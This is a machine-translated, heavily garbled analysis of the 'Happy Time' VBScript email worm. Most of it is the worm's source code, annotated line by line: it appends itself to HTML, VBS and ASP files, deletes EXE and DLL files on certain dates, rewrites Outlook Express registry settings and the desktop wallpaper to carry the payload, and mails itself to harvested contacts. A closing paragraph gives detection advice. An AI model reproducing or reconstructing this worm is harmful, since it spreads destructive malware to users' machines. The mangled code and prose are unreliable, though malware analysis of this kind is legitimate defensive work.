"Happy Time" Code Analysis
Transfer from
Sub mload () on error resume nextmpath = GRF () set OS = createObject ("scripTlet.Typelib") set oh = createObject ("shell.application") 'Establish an enumeration object, avoiding security audit if ishtml daml Then' call Ishtml function, if it is html, lowercase ... murl = LCase (Document.Location) if mpath = "" ThenOS.Reset Os.path = "c: /help.htm" os.doc = lhtml () Os.Write If mpath is empty, generate help.htmihtml = "" "under the C: hypertext content, and point to C: /Help.htmcall Document.Body.insertadjacenTml (" Afterbegin ", IHTML) Elseif IV (MPath, "Help.vbs") THENSETINTERVAL "RT ()", 10000ELSEM = "HTA" if Lcase (M) = Right (MURL, LEN (M)) THENID = setTimeout ("Mclose ()", 1) Set Timeout Condition Mainelse Os.reset () os.path = mpath & "os.doc = lhtml () os.write () iv mpath," Help.hta "" Generate Help.htaend IFEND IFELSEMAIN " No, it is implemented in the main function end imp "********************************************************************************************************************************************************************** ************************** The following is the main function, too long! Sub main () On Error Resume NextSet Of = CreateObject ( "Scripting.FileSystemObject") 'Needless to say, FileSystemObject object to create it Set Od = CreateObject ( "Scripting.Dictionary")' Create a Dictionary object, used to store data and key projects It is actually a relatively open array odd "html", "1100" OD.Add "VBS", "0100" Od.Add "HTM", "1100" OD.Add "ASP", "0010" 'Add to Dictionary objects to the item to be infected with Ks = "hkey_current_user / software /"' use variables to reduce code length DS = GRF () CS = GSF () if isvbs dam if it is VBS if.fileexists ("C: / Help.htm ") Then of.deletefile (" c: / Help.htm ") 'If c: /help.htm exists, delete, eliminate the legacy = CINT (Month (Date)
Day (Date)) if key = 13 Then 'If the month and the sum of the days are 13 (this is also a variant reason - change 13 to other numbers) Od.RemoveAllod.Add "EXE", "0001" OD.ADD "DLL", "0001" 'clear the Dictionary array and adds the exe, DLL to the Dictionary object, with the deletion of END IFCN = RG (KS & "Help / Count")' read the HKEY_CURRENT_USER in the registry / SOFTWARE / HELP / COUNT key value if cn = "" ", if count is 0, set to 1END IFRW KS &" Help / Count ", CN 1 'Add HKEY_CURRENT_USER / SOFTWARE / HELP / COUNT key value, Value 2f1 = rg (KS & "Help / filename") ')' Reread HKEY_CURRENT_USER / SOFTWARE / HELP / FileName key value F2 = FNEXT (OF, OD, F1) 'Get file name FEXT = getext (OF, OD) , F2) 'Get the code of the file extension RW Ks & "Help / filename", F2' Add key value if isdel (fEXT) THEN 'If the fourth character of the extension is 1 - ie 0001 (EXE, DLL) F3 = f2 'Storage file name F2 = FNEXT (OD, F2)' Get file names of files? RW Ks & "Help / filename", F2 'Write Registry Of.deletefile F3' Delete File Elseif Lcase (wscript.scriptfullname) <> LCase (f2) Then 'If not the files in the collection FW, F2, FEXTEND IFEND IFIF (CINT (CN) MOD 366) = 0 THENIF (CINT (SECOND (TIME)) MOD 2) = 0 THEN 'to force conversion using the CINT function, and send mail tsendelseadds = oMsend (add) end ifend ifwp = rg ("HKEY_CURENT_USER / Control Panel / Desktop / Wallpaper ") IF RG (KS &" Help / Wallpaper ") <> wp or wp =" "The 'compares desktop wallpaper has changed if wp =" ""1 =" "N3 = CS &" / Help.htm "elsemp = of.getfile (wp) .parentFoldern1 = of.getFileName (WP) N2 = of.GetBaseName (WP) N3 = CS &" / "& n2 &" .htm "end ifset pfc = of.createtextfile (N3, TRUE) MT = SA ("1100") 'Creating a super text PFC.Write "<" & "html> <" & "
Body BGColor = '# 007f7f' background = '"& n1 &"> <"&" / body> <"/ html>" & MT' hyperclic content PFC.Closerw Ks & "Help / Wallpaper", N3RW "HKEY_CURRENT_USER / Control Panel / Desktop / Wallpaper", N3 'Sets poisoned hypertext set to active desktop END IFELSESET FC = Of.CreatetextFile (DS & "/ Help.vbs", true) fc.write sa ("0100 ") 'Creating VBS file fc.closebf = cs &" /untitled.htm"set fc2 = of.createtextFile (bf, true) fc2.write lhtmlfc2.close' Create Untitled.htmoEID under Windows ("HKEY_CURRENT_USER / IDENTIES / Default user ID ") OE =" HKEY_CURRENT_USER / IDentities / "& Oeid &" / SOFTWARE / Microsoft / Outlook Express / 5.0 / Mail "MSH = OE &" / Message Send HTML "Cus = OE &" / Compose Usenessery " SN = oe & "/ Stationery Name" Rw MSH, 1Rw CUS, 1Rw SN, bf 'in Hkey_Current_User\Identities\ {AECF6CA3-9614-4AF4-AEF2-CT63FE9D97A4} was added three times \Software\Microsoft\Outlook Express\5.0\Mail Key value message send html, compose use stationry, and stationery, the first two values are 1, the latter point to windows / ust.htmweb = cs & "/ web" set gf = of.getfolder (web) .files' The file odd.add "htt" in the Windows / Web folder, "1100" 'adds HTT project to Dictionary to for EAC HM in GF 'Traversing each file under Windows / Web FEXT = getExt (OD, M)' gets the extension of each file if Fext <> "" If the extension is not empty, fW is, fW of, M, FEXTEND IFNEXTEND IFEND SUB '**************************************************** ************************ SUB MCLOSE () Document.write "&" Title> I am Sorry! 'Write I am Sorry and close .
With this as a marker for infection, WINDOW.CLOSEEND SUB '*************************************************************************************************************** ************************************** SUB FW (of, s, n) 'This time S is the file name, n is the file extension Name DIM FC, FC2, M, MMAIL, MTON Error Resume NextSet FC = Of.OpenTextFile (S, 1) 'read-only mode Open this file MT = fc.readall' Read all file stream fc.close 'Off file if not Not Not NOT SC (MT) THEN 'If the mmail = ml (MT) MT = SA (N) set fc2 = of.opEntextFile (s, 8)' opens the file and writes the write operation in the end of the file FC2.Write MTFC2.Closemsend ( Mmail) 'hair poison mail end ingnd sub' ************************************************** ************************** FUNCTION SC (S) Mn = "Rem I am Sorry! Happy Time" if IF INSTR (S, MN) > 0 THEN 'If there is a Rem I am Sorry! Happy Timesc = true elsesc = false' in the read file stream, returning True, otherwise false ifend function '********** *********************************************************** ***** Function FNEXT (Of, OD, S) DIM FPATH, FNAME, FEXT, T, GFON Error ResMe nextfname = "" T = false 'Initialization Variable IF OF OLEEXISTS (S) Then' If S exists in the current FPATH = 0.GETFILE (s) .ParentFolder 'Get the file's parent directory name fname = s' Get file name Elseif butfoldeRexists (s) THEN' does not exist in the current folder, get the directory name fpath = ST = Trueelsefpath = DNEXT (of, "" ) 'Get the current drive - the root directory end ifdo while trueSet GF = of.getfolder (files "Get all file objects in the current directory for Each M in GF' Traversing Each file If Thenif getExt (of , Od, m) <> "" If the file is a file name in the file collection, it returns the file name, for the function or process used - infected or deleted exit functionend iFelseif Lcase (M ) = Lcase (fname) or fname = "" "" If there is no file T = TrueEnd ifXTfpath = pnext (of, fpath) 'Loopend Function' ******************** ****************************************************** Function PNEXT ( Of, s) on Error ResMe nextddim PPath, NPath, GP, PN, T, MT =
Falseif Of.FoldEREXISTS (S) Then 'If there is set gp = of.getfolder if the specified folder exists, you get the number of sub-directory pn = gp.countif pn = 0 Then' If there is no child directory PPath = LCase (S) 'npath = lcase (of.getParentFoldername (s))' Gets the lowercase form of the parent directory T = Trueelsenpath = LCase (s) 'has a subdirectory, get the collection of its lowercase End ifdo While Not Er' for Each PN IN OF Of.GetFolder (npath). Subfolders 'Get subdirectory in subdirectory if Thenif ppath = lcase (pn) THENT = false = lcase (pn) exit functionend ifxt = trueppath = lcase (npath)' Transforms strings Small write npath = of.getParentFoldername (npath) 'IF of.getFolder (ppath) .Istfolder the' If it is root directory m = of.getdrivename (ppath) to get partitioned PNEXT = DNEXT (OF, M) EXIT FUNCTIONEND IFLOOPEND IFEND FUNCTION '********************************************************************************************************************************** ******************* FUNCTION DNEXT (OF, S) DIM DC, N, D, T, MON Error ResMe nextt = falsem = "" SET DC = of.drives 'Get all drive letter for Each D in DC' Traversed Each Drive If D.DriveType = 2 or D.DriveType = 3 TEN 'If it is a network disk or local disk if t thendnext = dexit function' If it is false, Returns the current disk, and exits this function elseif lcase (s) = lcase (d), if it is true and the same is the same, the T is TRUET = Trueen Di IFIF M = "" "If M is empty, pay the disk to mm = dend ifend ifnd ifnextdDNext = m 'return drive end function' **************** *********************************************************** Function getExt (OD, S) DIM FEXTON ERROR Resume NextFext = LCASE (OF.GETEXTENSITIONNAME (SGETEXTENSITIONNAME (SGETEXTENSITIONNAME (s)) 'Returns the lowercase getExt = OD.ID.Id.Id.Id.Id.Id.Id.item (fEXT)' for the Dictionary object. Item, 0001 (exe), etc. End function '************************************************************ ************************************ SUB RW (K, V) 'Write Registry DIM RON Error ResMe NextSet R = CREATEOBJECT ("
Wscript.shell ") 'Create an object R.Regwrite K, vend sub' ************************************************************* ******************************************* FUNCTION RG (V) 'Read Registry DIM RON Error Resume NextSet R = CREATEOBJECT "Wscript.shell") 'Create an object RG = R.REGREAD (V) end function' ************************************************** ********************************************* FUNCTION ISVBS () 'This function is determined whether it is VBS file Dim errteston Error resume nexterrtest = wscript.scriptfullnameif err Then 'If an error is wrong, it is not vbsisvbs = falseelseisvbs = trueEnd ifend function' ******************************************************************* *********************************************** FUNCTION ISHTML () "This function is judged to be HTML Document DIM Errteston error resume nexterrtest = Document.locationif er thnishtml = false 'If an error, it is not a hypertext elseishtml = truend impSeishtml = truend impuND Function' ****************************** ***************************************************** Function ismail (s) ' This function is not a mail address DIM M1, M2ISMAIL = FALSEIF INSTR (S, VBCRLF) = 0 THEN 'Returns the position where VBCRLF in S is the first time, VBCRLF is a wrap M1 = INSTR (S, "@") M2 = INSTR (s, ") IF m1 <> 0 and m1 & "<" & "Title> Help" <"&" body> "& lscript (lvbs ()) & vbcrlf & _ <" & "/ body> end function" ********* *********************************************************** ******* Function Lscript (s) 'Writing VBScript Declaration Lscript = "<" Script Language =' Vbscript '> "& Vbcrlf & _s &" <"/ Script" & ">" End function '****************************************************************** ******************* Function SL (S1, S2, N) DIM L1, L2, L3, IL1 = LEN (S1) 'Getting the length of the file stream L2 = LEN (S2) 'Get Mailto: Length I = INSTR (S1, S2)' During the file stream: The first appearance position-value is a number if i> 0 Then 'finds a string operation L3 = I L2 - 1IF N = 0 THENSL = Left (S1, I - 1) Elseif N = 1 Tensl = Right (S1, L1 - L3) end ifelsesl = "" "end ifnd function" ******* *********************************************************** ******** Function OG () 'Get the mail address DIM i, N, M (), OOM, OOSet OO = CreateObject ("Outlook.Application")' creation Outlook Application Objects, Outlook and Outlook Express can't run off! Set om = oo.getnamespace ("MAPI"). GetDefaultfolder (10) .Itemsn = om.countredim m (n) for i = 1 to nm (i - 1) = Om.item (i) .Email1address gets the email address in each WAB NEXTOG = Mend function '*********************************************************************************************************************************************************************************************************************************************************************************************** ******************* SUB Tsend () 'Hair Toxic Mail DIM OD, MS, MM, A, MSET OD = CREATEOBJECT ("Scripting.Dictionary") MConnect MS , Mmmm.fetchsorted = truemm.fetchfor i = 0 to mm.msgcount - 1mm.msgindex = IA = mm.msgorigaddressif Od.Item (a) = "" THENOD.ITEM (a) = Mm.msgsubjects Ifr.MsgSubjectFor Each M in in ket.keysmm.com = "fw:" & od.Item (m) Set Mail Title mm.recipaddress = m 'This message mm.attachmentPathname = GSF & "/Untitled.htm" 'Add attachment Windows / UnTID.htmmm.send' Send! NEXTMS.SIGNOFFEND SUB '****************************************************************************************** ***************************** Function Er () 'Setup error traps, avoiding program crash, rigorous style is worth learning if err.number = 0 thener = falseelseerr. Clearer = truend ifend function '*********************************************************** ********************** FUNCTION Isdel (s) 'This function views whether the current file is the file type IF MID (S, 4, 1) = 1 THEN 'Look at the fourth character of S is 1 - 0001 (exe and dll) isdel = true', if it returns True, returning elsendel = false ', if not, return false ifend function' *** *********************************************************** ************ The above considerations have only been used in terms of technically innovative and important modules for everyone to study and learn. From the code, you can see that "Happy Time" also uses the technology of "Love" FileSystemObject (file system object), which is almost a mustable part of all VBS mail viruses. So if the anti-virus software monitors all the FileSystemObject keywords in all HTML and VBS, you can effect all and potential variants (although some kind of hypertext and VBS misstades may be positively, "it is still" rather. Live a poison. If you only monitor keywords, such as "I Love You", "Happy Time", "Happy Time", "happy time", the cleaves can be changed, then the title, The content and source of the variable name in the source code are replaced, and the anti-virus software with "smart torry" is only a dumb, and the poison is excited. If you are using Foxmail 3.x, congratulations! Foxmail 3.0 or more The version is strictly divided into text messages and hypercraft messages. The default hypertext mail needs to click the small earth icon on the right corner. If you suspect a letter may poison, you can delete it, or Export into ASCII files to open research research with Notepad. And old foxmail and Outlook Express are not so lucky, that is, I have seen the title, but OE will become a tatch source, send a poison email.